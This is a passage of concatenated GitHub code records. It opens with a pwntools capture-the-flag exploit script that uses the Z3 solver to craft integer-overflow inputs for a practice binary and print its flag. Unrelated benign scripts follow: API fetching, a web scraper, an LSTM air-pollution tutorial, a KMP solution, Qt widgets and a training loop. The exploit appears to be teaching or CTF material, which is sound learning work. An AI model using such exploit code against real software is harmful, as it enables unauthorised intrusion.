---\n\n#context.log_level = 'debug'\ncontext.terminal = [\"tmux\", \"sp\", \"-h\"]\ncontext.endian = 'little'\n\nPATH = './Integer_Operations'\n\nREMOTE = 0\n\nHOST = '127.0.0.1'\nPORT = 1337\n\ndef level_1():\n\n r.recvuntil('?\\n')\n \n data = r.recvuntil('?\\n')\n \n given = int((data.split('to '))[1].split('?')[0])\n \n log.info('x + ' + str(given) + ' < 0')\n \n lvl1 = Solver()\n\n given_n = BitVec('given_n', 32)\n num = BitVec('num', 32)\n sum_x = BitVec('sum_x', 32)\n\n lvl1.add(given_n == given)\n lvl1.add(sum_x == given_n + num)\n lvl1.add(sum_x < 0)\n lvl1.add(num > 0)\n\n lvl1.check()\n\n output = str(lvl1.model())\n\n num_out = (output.split('num = '))[1].split(',')[0]\n \n log.success('Integer overflow level 1: ' + str(num_out))\n \n r.recvuntil('integer (decimal):')\n r.sendline(str(int(num_out)))\n\ndef level_2():\n\n r.recvuntil('?\\n')\n \n data = r.recvuntil('\\n')\n \n given = int((data.split('from '))[1].split('\\n')[0])\n \n log.info('(' + str(given) + ') - x > 0')\n \n lvl2 = Solver()\n\n given_n = BitVec('given_n', 32)\n num = BitVec('num', 32)\n sub_x = BitVec('sub_x', 32)\n\n lvl2.add(given_n == given)\n lvl2.add(sub_x == given_n - num)\n lvl2.add(sub_x > 0)\n lvl2.add(num < 0)\n\n lvl2.check()\n\n output = str(lvl2.model())\n \n num_out = (output.split('num = '))[1].split(',')[0]\n \n log.success('Integer overflow level 2: ' + str(num_out))\n \n r.recvuntil('integer (decimal):')\n r.sendline(str(int(num_out)))\n\ndef level_3():\n \n log.info('x + y = 1337')\n log.info('x > 1337')\n log.info('y > 1337')\n \n lvl3 = Solver()\n\n n = BitVec('n', 32)\n x_n = BitVec('x_n', 32)\n y_n = BitVec('y_n', 32)\n\n lvl3.add(n == 1337)\n lvl3.add(x_n + y_n == n)\n lvl3.add(UGE(x_n, n))\n lvl3.add(UGE(y_n, n))\n\n lvl3.check()\n\n output = str(lvl3.model())\n \n x = (output.split('x_n = '))[1].split(',')[0]\n y = (output.split('y_n = '))[1].split(',')[0]\n \n log.success('Integer overflow level 3 (x): ' + str(x))\n log.success('Integer overflow level 3 (y): ' + str(y))\n \n r.recvuntil('value (decimal):')\n r.sendline(str(int(x)))\n r.recvuntil('value (decimal):')\n r.sendline(str(int(y)))\n\ndef level_4():\n\n 
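# Find x >= 1337 (unsigned) with x*x - 153153 == 417061379; the 32-bit\n    # BitVecs wrap on multiply, presumably matching the target binary.\n    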
log.info('x > 1337')\n log.info('x**2 - 153153 = 417061379')\n \n lvl4 = Solver()\n\n n = BitVec('n', 32)\n x_n = BitVec('x_n', 32)\n n1 = BitVec('n1', 32)\n n2 = BitVec('n2', 32)\n\n lvl4.add(n == 1337)\n lvl4.add(n1 == 153153)\n lvl4.add(n2 == 417061379)\n lvl4.add(UGE(x_n, n))\n lvl4.add(x_n*x_n - n1 == n2)\n\n lvl4.check()\n\n output = str(lvl4.model())\n\n x = (output.split('x_n = '))[1].split(',')[0]\n\n log.success('Integer overflow level 4: ' + str(x))\n \n r.recvuntil('value (decimal):')\n r.sendline(str(int(x)))\n\ndef flag():\n r.recvuntil('your ')\n data = r.recv()\n flag = (data.split('flag:\\n'))[1].split('\\n')[0]\n log.success('Flag: CybexCTF{' + flag + '}')\n \ncontext.binary = PATH\nif REMOTE:\n\tr = remote(HOST, PORT)\nelse:\n\tr = process(PATH)\n\n\nlevel_1()\nlevel_2()\nlevel_3()\nlevel_4()\nflag()\n\nr.close()\n","repo_name":"cqcya/exploit-challenges","sub_path":"Cybexsec_CTF/Integer Operations/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24877360418","text":"import requests\nimport json\n\n# Make an API call, and store the response\nurl = 'https://hacker-news.firebaseio.com/v0/item/19155826.json'\nr = requests.get(url)\nprint(f\"Status code: {r.status_code}\")\n\n# Explorre the structure of the data\nresponse_dict = r.json()\nreadable_file = 'data/readable_hn_data.json'\ntry:\n with open(readable_file, 'w') as f:\n json.dump(response_dict, f, indent = 4)\nexcept FileNotFoundError:\n print(f\"{readable_file} does not exist\")\nelse:\n print(\"Json content written successfully to file\")\n","repo_name":"natcobbinah/Python_prog","sub_path":"python - Eric Mathes/apis/hn_article.py","file_name":"hn_article.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1661248169","text":"\"\"\"\nTools for inspecting existing clusters.\n\"\"\"\n\nimport click\n\nfrom dcos_e2e_cli.common.inspect_cluster import show_cluster_details\nfrom dcos_e2e_cli.common.options import (\n existing_cluster_id_option,\n verbosity_option,\n)\nfrom dcos_e2e_cli.common.utils import check_cluster_id_exists\n\nfrom ._common import ClusterInstances, existing_cluster_ids\nfrom ._options import aws_region_option\n\n\n@click.command('inspect')\n@existing_cluster_id_option\n@aws_region_option\n@verbosity_option\ndef inspect_cluster(cluster_id: str, aws_region: str) -> None:\n \"\"\"\n Show cluster details.\n \"\"\"\n check_cluster_id_exists(\n new_cluster_id=cluster_id,\n existing_cluster_ids=existing_cluster_ids(aws_region=aws_region),\n )\n cluster_instances = ClusterInstances(\n cluster_id=cluster_id,\n aws_region=aws_region,\n )\n show_cluster_details(\n cluster_id=cluster_id,\n cluster_representation=cluster_instances,\n )\n","repo_name":"dcos/dcos-e2e","sub_path":"src/dcos_e2e_cli/dcos_aws/commands/inspect_cluster.py","file_name":"inspect_cluster.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"71844023480","text":"import fileinput\nimport re\nfrom copy import deepcopy\n\ndef run(P, ip, acc):\n words = P[ip]\n if words[0] == 'acc':\n acc += int(words[1])\n ip += 1\n elif words[0] == 'nop':\n ip += 1\n elif words[0] == 'jmp':\n ip += int(words[1])\n return (ip, acc)\n\nP = list([l.split() for l in fileinput.input(files='test.txt')])\n\nip = 0\nacc = 0\nseen 
= []\nlist_inr = []\ninr = []\nwhile True:\n curr_ip = ip\n if ip in seen:\n print(acc)\n break\n seen.append(ip)\n ip, acc = run(P, ip, acc)\n if ip >= curr_ip:\n inr.append(curr_ip)\n else:\n inr.append(curr_ip)\n list_inr.append(inr)\n inr = []\n\nPmod = deepcopy(P)\n\nif Pmod[list_inr[-2][-1]][0] == 'nop':\n Pmod[list_inr[-2][-1]][0] = 'jmp'\nelif Pmod[list_inr[-2][-1]][0] == 'jmp':\n Pmod[list_inr[-2][-1]][0] = 'nop'\n\nip = 0\nacc = 0\nseen = []\nwhile 0<=ip<len(Pmod):\n seen.append(ip)\n ip, acc = run(Pmod, ip, acc)\nif ip == len(Pmod):\n print(acc)\n","repo_name":"CuongNN218/Advent-of-Code-2020","sub_path":"day8/solver_2_new.py","file_name":"solver_2_new.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4957087125","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nd = np.genfromtxt(\"12_26_23_33/diagnostics.txt\")\n\nplt.subplot(311)\nplt.plot(d[:,1] - np.min(d[:,1]), d[:,3], '.k')\nplt.ylabel(\"Background (e-)\")\n\nplt.subplot(312)\nplt.plot(d[:,1]- np.min(d[:,1]), (d[:,4] - np.median(d[:,4]))/45., '.k')\nplt.ylim(-0.2,0.2)\nplt.ylabel(\"Spectral shift (pix)\")\n\nplt.subplot(313)\nplt.plot(d[:,1]- np.min(d[:,1]), 1.*(d[:,5] - np.mean(d[:,5])), '.k')\nplt.ylim(-0.2,0.2)\nplt.ylabel(\"Spatial shift (pix)\")\n\nplt.xlabel(\"Time (days since first exposure)\")\n\nplt.tight_layout()\nplt.show()\n","repo_name":"lkreidberg/2019_exomoon","sub_path":"figures/fig0_diagnostics.py","file_name":"fig0_diagnostics.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10789980905","text":"# Time: O(n + m)\n# Space: O(n + m)\n\n# kmp solution\nclass Solution(object):\n def removeOccurrences(self, s, part):\n \"\"\"\n :type s: str\n :type part: str\n :rtype: str\n \"\"\"\n def getPrefix(pattern):\n prefix = [-1]*len(pattern)\n j = -1\n for i in xrange(1, len(pattern)):\n while j != -1 and pattern[j+1] != pattern[i]:\n j = prefix[j]\n if pattern[j+1] == pattern[i]:\n j += 1\n prefix[i] = j\n return prefix\n \n prefix = getPrefix(part)\n result, lookup = [], []\n i = -1\n for c in s:\n while i != -1 and part[i+1] != c:\n i = prefix[i]\n if part[i+1] == c:\n i += 1\n result.append(c)\n lookup.append(i)\n if i == len(part)-1:\n result[len(result)-len(part):] = []\n lookup[len(lookup)-len(part):] = []\n i = lookup[-1] if lookup else -1\n return \"\".join(result)\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/remove-all-occurrences-of-a-substring.py","file_name":"remove-all-occurrences-of-a-substring.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"9238561135","text":"from collections.abc import Iterable\n\nfrom PySide2.QtCore import QPoint, QSize, QTimer, Qt\nfrom PySide2.QtGui import QColor, QDoubleValidator, QIcon, QIntValidator\nfrom PySide2.QtWidgets import QApplication, QCheckBox, QFormLayout, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLayout, QLineEdit, QOpenGLWidget, QPushButton, QScrollArea, QSizePolicy, QSlider, QTextEdit, QVBoxLayout, QWidget\n\nfrom .common import *\n\nfrom .protocol import *\nfrom .ranges import *\n\ndef removeFromLayout(layout, i):\n \"\"\"\n Remove i-th item\n \"\"\"\n count = layout.count()\n i = i if i >= 0 else count + i\n if i >= count or i < 0:\n return False\n item = layout.itemAt(i)\n if item is None:\n return False\n 
widget = item.widget()\n if widget is None:\n layout.removeItem(item)\n else:\n layout.removeWidget(widget)\n widget.setParent(None)\n return True\n\ndef removeAllWidgetsFromLayout(layout:QLayout, types=None):\n l = [layout.itemAt(i).widget() for i in range(layout.count())]\n \n for w in l:\n if not types or isinstance(w, types):\n w.deleteLater()\n # w.setParent(None) # prefer deleteLater to bypass the bug caused by consecutive signal from editfinsihing (lose focus and press enter at the same time)\n layout.removeWidget(w)\n\ndef tryParse(v, funcs, default=None):\n if not isinstance(funcs, Iterable):\n funcs = [funcs]\n \n for f in funcs:\n try:\n v = f(v)\n except:\n return default\n return v\n\ndef tryParseInt(v, default=None):\n return tryParse(v, int, default)\n \ndef tryParseFloat(v, default=None):\n return tryParse(v, float, default)\n\nclass QCheckBoxWithCB(QCheckBox):\n def __init__(self, initChecked=False, changeCB=None):\n super().__init__()\n self.setChecked(initChecked)\n if changeCB:\n self.stateChanged.connect(changeCB)\n\nclass QNumEdit(QLineEdit):\n def __init__(self, initVal=0, editCB=None, parent=None):\n super().__init__(str(initVal), parent=parent)\n self.editingFinished.connect(lambda: editCB(self.text()))\n \n def setText(self, val):\n super().setText(str(val))\n \n def label(self):\n return \"\"\n \nclass QIntEdit(QNumEdit):\n def __init__(self, initVal=0, minVal=None, maxVal=None, editCB=None, parent=None):\n super().__init__(initVal, editCB=editCB, parent=parent)\n self.setValidator(QIntValidator(int(minVal), int(maxVal)))\n\n @property\n def label(self):\n return f\"Range: ({self.validator().bottom()}, {self.validator().top()})\"\n \nclass QFloatEdit(QNumEdit):\n def __init__(self, initVal=0.0, minVal=None, maxVal=None, decimal=None, editCB=None, parent=None):\n super().__init__(initVal, editCB=editCB, parent=parent)\n self.setValidator(QDoubleValidator(float(minVal), float(maxVal), int(decimal)))\n \n @property\n def label(self):\n return f\"Range: ({self.validator().bottom()}, {self.validator().top()}) [decimals: {self.validator().decimals()}]\"\n \n\n","repo_name":"dixon777/variableNeutralLineManipulator","sub_path":"variable_neutral_line_manipulator/gui/gui_common/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21150279341","text":"f = open('sum_of_digits')\r\nN = int(f.readline())\r\nresult_arr = []\r\nfor i in range(N):\r\n sum_digits = 0\r\n arr = f.readline().split()\r\n sum_number = int(arr[0]) * int(arr[1]) + int(arr[2])\r\n for ch in str(sum_number):\r\n sum_digits += int(ch)\r\n result_arr.append(sum_digits)\r\n\r\nfor ch in result_arr:\r\n print(ch, end=' ')\r\n","repo_name":"alchupin/CodeAbbey","sub_path":"abbey_sum_of_digits.py","file_name":"abbey_sum_of_digits.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21554763878","text":"import argparse\nimport evaluate\nimport os\nimport pandas as pd\nimport json\nfrom typing import List\nfrom tqdm import tqdm\n\nfrom utils.CER import CER, PER\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-f\", \"--result-file\",\n type=str,\n required=True,\n help=\"Json file\"\n )\n parser.add_argument(\n \"--ref-text-key\",\n type=str,\n default='lyric',\n help=\"\"\n )\n parser.add_argument(\n \"--pred-text-key\",\n type=str,\n 
default='inference',\n help=\"\"\n )\n parser.add_argument(\n '--ref-timestamp-key',\n type=str,\n default='onset_offset'\n )\n parser.add_argument(\n '--pred-timestamp-key',\n type=str,\n default='inference_onset_offset'\n )\n\n args = parser.parse_args()\n return args\n\ndef is_english(char) -> bool:\n ascii_value = ord(char)\n return (ascii_value >= 65 and ascii_value <= 90) or (ascii_value >= 97 and ascii_value <= 122)\n\ndef remove_english(sentence: str):\n result = ''\n for char in sentence:\n if is_english(char) == False:\n result += char\n \n return result\n\n\ndef compute_cer(\n reference: List[str], \n prediction: List[str],\n is_per: bool=False\n):\n metric_name = 'PER' if is_per else 'CER'\n\n CER_weighted = 0.0\n op_count = {'substitution': 0,\n 'insertion': 0,\n 'deletion': 0,\n 'correct': 0}\n for ref, pred in tqdm(zip(reference, prediction)):\n # Remove All English Characters\n pred = remove_english(pred)\n\n if is_per:\n cer, nb_map = PER(hypothesis=pred,\n reference=ref)\n else:\n try:\n cer, nb_map = CER(hypothesis=list(pred),\n reference=list(ref))\n except:\n cer, nb_map = CER(hypothesis=[],\n reference=list(ref))\n \n CER_weighted += cer\n op_count['substitution'] += nb_map['S']\n op_count['insertion'] += nb_map['I']\n op_count['deletion'] += nb_map['D']\n op_count['correct'] += nb_map['C']\n \n print('=' * 30)\n print(f\"{metric_name} (Weighted):\", CER_weighted / len(reference))\n print(\"Wrong Operations:\")\n for key, value in op_count.items():\n print(f\"{key}: {value}\")\n print('-' * 30)\n # weighted evaluate\n if is_per:\n CER_unweighted = (op_count['substitution'] + op_count['deletion'] + op_count['insertion']) / (op_count['substitution'] + op_count['deletion'] + op_count['correct'])\n else:\n metric = evaluate.load(\"cer\")\n CER_unweighted = metric.compute(references=reference,\n predictions=prediction)\n \n print(f\"{metric_name} (Unweighted):\", CER_unweighted)\n print(\"=\" * 30)\n\n\n\ndef main():\n args = parse_args()\n\n assert os.path.exists(args.result_file)\n with open(args.result_file, 'r') as f:\n results = json.load(f)\n\n # CER\n compute_cer(reference=[result[args.ref_text_key] for result in results],\n prediction=[result[args.pred_text_key] for result in results])\n # PER\n compute_cer(reference=[result[args.ref_text_key] for result in results],\n prediction=[result[args.pred_text_key] for result in results],\n is_per=True)\n \nif __name__ == \"__main__\":\n main()","repo_name":"navi0105/LyricAlignment","sub_path":"evaluate_transcript.py","file_name":"evaluate_transcript.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"674435034","text":"import heapq\n\ndef solution(scoville, K):\n count = 0\n heapq.heapify(scoville)\n\n while 1:\n if len(scoville) <= 1 and scoville[0] < K:\n count = -1\n break\n if scoville[0] >= K:\n break\n new = heapq.heappop(scoville) + (heapq.heappop(scoville) * 2)\n heapq.heappush(scoville, new)\n count += 1\n\n return count\n\n","repo_name":"ChaeHyeonU/Algorithm","sub_path":"PG_Heap1.py","file_name":"PG_Heap1.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72504294839","text":"from collective.badge.testing import COLLECTIVE_BADGE_INTEGRATION_TESTING\nfrom plone import api\nfrom plone.testing import z2\nfrom plone.app.testing import SITE_OWNER_NAME\nimport unittest\n\n\nclass TestBadge(unittest.TestCase):\n 
layer = COLLECTIVE_BADGE_INTEGRATION_TESTING\n\n    def setUp(self):\n        self.app = self.layer['app']\n        self.portal = self.layer['portal']\n        self.request = self.layer['request']\n        z2.login(self.app['acl_users'], SITE_OWNER_NAME)\n        self.user1 = api.user.create(\n            email='user1@example.com',\n            username='user1',\n            password='123'\n        )\n        self.badge = api.content.create(\n            container=self.portal,\n            type='Badge',\n            id='test-badge',\n            title='Test Badge',\n        )\n\n    def test_create_badge(self):\n        self.assertTrue('test-badge' in self.portal)\n        badge = self.portal['test-badge']\n        self.assertEquals('Badge', badge.portal_type)\n\n    def test_render_badge_view(self):\n        html = self.badge()\n        self.assertTrue('Test Badge' in html)\n\n    def test_assign_badge_to_user(self):\n        badge = self.badge\n        badge.assign_to_user('user1')\n        self.assertTrue(badge.is_assigned_to_user('user1'))\n\n        badge.remove_from_user('user1')\n        self.assertFalse(badge.is_assigned_to_user('user1'))\n\n    def test_list_active_users(self):\n        badge = self.badge\n        self.assertEqual(badge.list_active_users(), [])\n\n        badge.assign_to_user('user1')\n        self.assertEqual(badge.list_active_users(), ['user1'])\n\n    def test_badges_for_user(self):\n        from ..api import badges_for_user\n        self.assertEquals(len(badges_for_user('user1')), 0)\n\n        self.badge.assign_to_user('user1')\n        self.assertEquals(len(badges_for_user('user1')), 1)\n","repo_name":"collective/collective.badge","sub_path":"src/collective/badge/tests/test_badge.py","file_name":"test_badge.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
+{"seq_id":"24071702731","text":"from .Block import *\nfrom TickHandler import handler as tickhandler\nimport globals as G\n\n\nclass FallingBlock(Block):\n    def update(self, model, window):\n        # unpack the block's current position before testing the cell below it\n        (x, y, z) = self.pos\n        if not (x, y - 1, z) in model.world:\n            tickhandler.run(self.reupdate, 1, args=[model, window])\n\n    def reupdate(self, model, window):\n        (x, y, z) = self.pos\n        if not (x, y - 1, z) in model.world:\n            if model.move_block(self.pos, (x, y - 1, z), immediate=False) != False:\n                model.updateNexts((x, y, z))\n                model.updateNexts((x, y - 1, z))\n            elif not model.world[(x, y - 1, z)].isFullBlock():\n                G.player.addToFreePlace(self.getDropBlock())\n\n    def getDropBlock(self):\n        return self.getDrop(None)\n","repo_name":"uuk0/mcpython-a-minecraft-clone-in-python","sub_path":"mods/mcpython/Blocks/fallingblock.py","file_name":"fallingblock.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
+{"seq_id":"39323897731","text":"import os\nos.system('cls')\n\n# Build a custom error and customize it by inheriting from Exception\n\nclass NegativeAgeError(Exception):\n    def __init__(self, message, age):\n        self.message = message\n        self.age = age\n\n\ndef check_age(age):\n    if age < 0:\n        raise NegativeAgeError('Your age cannot be negative', age)\n    return age * 2\n\n\nuser_age = int(input(\"enter your age: \"))\n\ntry:\n    print(check_age(user_age))\nexcept NegativeAgeError as e:\n    print(e.message, e.age)\n","repo_name":"VahidRajabi-2000-5/Exception-Handling","sub_path":"1_EH/6_EH.py","file_name":"6_EH.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"26174357279","text":"import requests\nfrom bs4 import BeautifulSoup\nurl=\"http://quotes.toscrape.com/\"\nresponse=requests.get(url)\n\n#Parse text using lxml\nsoup=BeautifulSoup(response.text, 
\"lxml\")\n#print(soup)\n\n#All quotes have the tag \"span\" and the class \"text\"\nquotes=soup.find_all(\"span\", class_=\"text\")\n\n#All authors have the tag \"small\" and the class \"author\"\nauthors=soup.find_all(\"small\", class_=\"author\")\n\n#All authors have the tag \"a\" and the class \"tag\"\n#But there can be more than one tag per quote, so we use the entire quote box\ntags=soup.find_all(\"div\", class_=\"tags\")\n\nfor i in range(0, len(quotes)):\n print(quotes[i].text)\n print(authors[i].text)\n quoteTags=tags[i].find_all(\"a\", class_=\"tag\")\n for quoteTag in quoteTags:\n print(quoteTag.text)\n\n","repo_name":"JacobRaymond/AutomatingWithPython","sub_path":"Isolate_Data.py","file_name":"Isolate_Data.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17654508578","text":"EMAIL_INPUT = {\"tag\": \"input\", \"title\": \"E-mail*\", \"label\": \"email\", \"args\": {\"type\": \"email\", \"id\": \"email\", \"name\": \"email\", \"placeholder\": \"seuemail@email.com\"}}\nASSUNTO_INPUT = {\"tag\": \"input\", \"title\": \"Assunto*\", \"label\": \"assunto\", \"args\": {\"type\": \"text\", \"id\": \"assunto\", \"name\": \"assunto\", \"placeholder\": \"Assunto\"}}\nDESCRICAO_INPUT = {\"tag\": \"textarea\", \"title\": \"Descrição*\", \"label\": \"descricao\", \"args\": {\"rows\": \"2\", \"cols\": \"32\", \"name\": \"descricao\", \"id\": \"descricao\", \"placeholder\": \"Isso é uma descrição...\"}}\n\nCONTACT_TEXT = {\n \"title\": \"Fale conosco\",\n \"text\": [\n \"Lorem ipsum dolor sit amet consectetur adipisicing elit. Sequi odit quibusdam hic exercitationem ut esse, quae consectetur facilis?\",\n ]\n}\n","repo_name":"yrnThiago/Desafio_2","sub_path":"app/constants/contato.py","file_name":"contato.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"la","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10131775567","text":"#数据预处理\n#粗略的观察数据集会发现最开始的24小时PM2.5值都是NA,因此需要删除这部分数据,\n#对于其他时刻少量的缺省值利用Pandas中的fillna填充;同时需要整合日期数据,使其作为Pandas中索引(index)。 \n#下面的代码完成了以上的处理过程,同时去掉了原始数据中“No”列,并将列命名为更清晰的名字。\nfrom pandas import read_csv\nfrom datetime import datetime\n# load data\ndef parse(x):\n return datetime.strptime(x, '%Y %m %d %H')\t\ndataset = read_csv('F:raw.csv', parse_dates = [['year', 'month', 'day', 'hour']], index_col=0, date_parser=parse)\ndataset.drop('No', axis=1, inplace=True)\n# manually specify column names\ndataset.columns = ['pollution', 'dew', 'temp', 'press', 'wnd_dir', 'wnd_spd', 'snow', 'rain']\ndataset.index.name = 'date'\n# mark all NA values with 0\ndataset['pollution'].fillna(0, inplace=True)\n# drop the first 24 hours\ndataset = dataset[24:]\n# summarize first 5 rows\nprint(dataset.head(5))\n# save to file\ndataset.to_csv('pollution.csv')\n\n\n#处理后的数据存储在“pollution.csv”文件中\n#对除了类别型特性“风速”的每一列数据分别绘图\nfrom pandas import read_csv\nfrom matplotlib import pyplot\n# load dataset\ndataset = read_csv('pollution.csv', header=0, index_col=0)\nvalues = dataset.values\n# specify columns to plot\ngroups = [0, 1, 2, 3, 5, 6, 7]\ni = 1\n# plot each column\npyplot.figure()\nfor group in groups:\n pyplot.subplot(len(groups), 1, i)\n pyplot.plot(values[:, group])\n pyplot.title(dataset.columns[group], y=0.5, loc='right')\n i += 1\npyplot.show()\n\n\n#多变量LSTM预测模型\n#数据准备\n#采用LSTM模型时,第一步需要对数据进行适配处理,\n#其中包括将数据集转化为有监督学习问题和归一化变量(包括输入和输出值),\n#使其能够实现通过前一个时刻(t-1)的污染数据和天气条件预测当前时刻(t)的污染\n\n#利用sklearn的预处理模块对类别特征“风向”进行编码,当然也可以对该特征进行one-hot编码。 
\n#接着对所有的特征进行归一化处理,\n#将数据集转化为有监督学习问题,同时将需要预测的当前时刻(t)的天气条件特征移除,\n\n# convert series to supervised learning转为有监督学习(函数)\ndef series_to_supervised(data, n_in=1, n_out=1, dropnan=True):\n n_vars = 1 if type(data) is list else data.shape[1]\n df = DataFrame(data)\n cols, names = list(), list()\n # input sequence (t-n, ... t-1)\n for i in range(n_in, 0, -1):\n cols.append(df.shift(i))\n names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]\n # forecast sequence (t, t+1, ... t+n)\n for i in range(0, n_out):\n cols.append(df.shift(-i))\n if i == 0:\n names += [('var%d(t)' % (j+1)) for j in range(n_vars)]\n else:\n names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]\n # put it all together\n agg = concat(cols, axis=1)\n agg.columns = names\n # drop rows with NaN values\n if dropnan:\n agg.dropna(inplace=True)\n return agg\n\n# load dataset\ndataset = read_csv('pollution.csv', header=0, index_col=0)\nvalues = dataset.values\n# integer encode direction\nencoder = LabelEncoder()\nvalues[:,4] = encoder.fit_transform(values[:,4])\n# ensure all data is float\nvalues = values.astype('float32')\n# normalize features\nscaler = MinMaxScaler(feature_range=(0, 1))\nscaled = scaler.fit_transform(values)\n# frame as supervised learning\nreframed = series_to_supervised(scaled, 1, 1)\n# drop columns we don't want to predict\nreframed.drop(reframed.columns[[9,10,11,12,13,14,15]], axis=1, inplace=True)\nprint(reframed.head())\n\n#构造模型\n#\n#最终将输入(X)改造为LSTM的输入格式,即[samples,timesteps,features]。\n\n# 将数据集进行划分,然后将训练集和测试集划分为输入和输出变量,\nvalues = reframed.values\nn_train_hours = 365 * 24\ntrain = values[:n_train_hours, :]\ntest = values[n_train_hours:, :]\n# split into input and outputs\ntrain_X, train_y = train[:, :-1], train[:, -1]\ntest_X, test_y = test[:, :-1], test[:, -1]\n# reshape input to be 3D [samples, timesteps, features]\ntrain_X = train_X.reshape((train_X.shape[0], 1, train_X.shape[1]))\ntest_X = test_X.reshape((test_X.shape[0], 1, test_X.shape[1]))\nprint(train_X.shape, train_y.shape, test_X.shape, test_y.shape)\n\n\n#搭建LSTM模型 \n#LSTM模型中,隐藏层有50个神经元,输出层1个神经元(回归问题),\n#输入变量是一个时间步(t-1)的特征,损失函数采用Mean Absolute Error(MAE),优化算法采用Adam,模型采用50个epochs并且每个batch的大小为72。 \n#最后,在fit()函数中设置validation_data参数,记录训练集和测试集的损失,并在完成训练和测试后绘制损失图。\n\n# 设计网络\nmodel = Sequential()\nmodel.add(LSTM(50, input_shape=(train_X.shape[1], train_X.shape[2])))\nmodel.add(Dense(1))\nmodel.compile(loss='mae', optimizer='adam')\n# fit network\nhistory = model.fit(train_X, train_y, epochs=50, batch_size=72, validation_data=(test_X, test_y), verbose=2, shuffle=False)\n# plot history\npyplot.plot(history.history['loss'], label='train')\npyplot.plot(history.history['val_loss'], label='test')\npyplot.legend()\npyplot.show()\n\n\n#模型评估\n# make a prediction\nyhat = model.predict(test_X)\ntest_X = test_X.reshape((test_X.shape[0], test_X.shape[2]))\n# invert scaling for forecast\ninv_yhat = concatenate((yhat, test_X[:, 1:]), axis=1)\ninv_yhat = scaler.inverse_transform(inv_yhat)\ninv_yhat = inv_yhat[:,0]\n# invert scaling for actual\ntest_y = test_y.reshape((len(test_y), 1))\ninv_y = concatenate((test_y, test_X[:, 1:]), axis=1)\ninv_y = scaler.inverse_transform(inv_y)\ninv_y = inv_y[:,0]\n# calculate RMSE\nrmse = sqrt(mean_squared_error(inv_y, inv_yhat))\nprint('Test RMSE: %.3f' % rmse)\n\n\n","repo_name":"hitaitengteng/little_test_python","sub_path":"lstm_1.py","file_name":"lstm_1.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 
+{"seq_id":"19952933349","text":"from .BDefines import *\nimport platform\n\ndef GetSystemPlatform():\n (bits, linkage) = platform.architecture()\n system = platform.system()\n version = platform.version()\n \n systemL = system.lower()\n current = None\n if systemL == 'windows':\n current = BPlatformEnum.Windows\n elif systemL == 'linux':\n current = BPlatformEnum.Linux\n elif systemL == 'darwin':\n current = BPlatformEnum.OSX\n else:\n raise ValueError(f'BConstant->GetSystemPlatform exception, system: {system}')\n return current\n\nBConstSystemPlatform = GetSystemPlatform()","repo_name":"5yaojing/jenkinstest","sub_path":"python/framework/basic/BConstant.py","file_name":"BConstant.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73277292920","text":"import sys\nimport torch\nfrom tqdm import tqdm as tqdm\nfrom .meter import AverageValueMeter\nfrom .metrics_myself import Metrics\nimport numpy as np\n\nclass Epoch:\n\n def __init__(self, model, loss, metrics, stage_name, classes,device='cpu', verbose=True):\n self.model = model\n self.loss = loss\n self.metrics = metrics\n self.stage_name = stage_name\n self.classes=classes\n self.verbose = verbose\n self.device = device\n\n self._to_device()\n\n def _to_device(self):\n self.model.to(self.device)\n self.loss.to(self.device)\n # for metric in self.metrics:\n # metric.to(self.device)\n\n def _format_logs(self, logs):\n str_logs = ['{} - {:.4}'.format(k, v) for k, v in logs.items()]\n s = ', '.join(str_logs)\n return s\n\n def batch_update(self, x, y):\n raise NotImplementedError\n\n def on_epoch_start(self):\n pass\n\n def run(self, dataloader):\n\n self.on_epoch_start()\n\n logs = {}\n loss_meter = AverageValueMeter()\n metrics_meters = {metric: AverageValueMeter() for metric in self.metrics}\n\n\n all_hist_gpu=Metrics(num_classes=self.classes)\n 